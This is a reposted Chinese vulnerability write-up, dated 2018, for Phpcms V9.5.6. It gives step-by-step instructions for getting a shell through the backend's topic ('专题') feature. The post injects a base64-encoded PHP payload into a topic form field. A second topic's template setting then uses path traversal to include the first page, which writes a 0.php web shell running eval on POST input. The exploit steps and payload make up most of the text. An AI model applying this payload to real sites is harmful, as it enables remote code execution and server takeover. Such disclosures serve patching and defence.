热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

Phpcms最新版V9.5.6后台专题getshell漏洞

发布时间:2018-04-04 15:39文章来源:网络文章作者:秩名 点击次数:
摘要:PHPCMS程序版本Phpcms V9.5.6 低权限后台拿shell...

 

简要描述:

低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522

详细说明:

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

添加专题专题名称:test

  1. 专题横幅:/1.jpg
  2. 专题缩略图:/1.jpg
  3. 专题导读:
  4. 生成静态:是
  5. <?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==’)); ?>
  6. 专题生成目录:test000
  7. 专题子分类:test test
  8. 其他默认 -> 提交

2. 再次添加专题

  1. 专题名称:test1
  2. 专题横幅:/1.jpg
  3. 专题缩略图:/1.jpg
  4. 专题导读:
  5. 生成静态:是
  6. 专题生成目录:test111
  7. 专题子分类:test test
  8. 扩展设置
  9. 专题模板:value设置为../../../../html/special/test000/index

其他默认 -> 提交

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

漏洞证明:

标签分类:

上一篇:SupperRadius企业版V3.0 SQL注射漏洞
下一篇:DedeCMS V5.7 SP2后台存在代码执行漏洞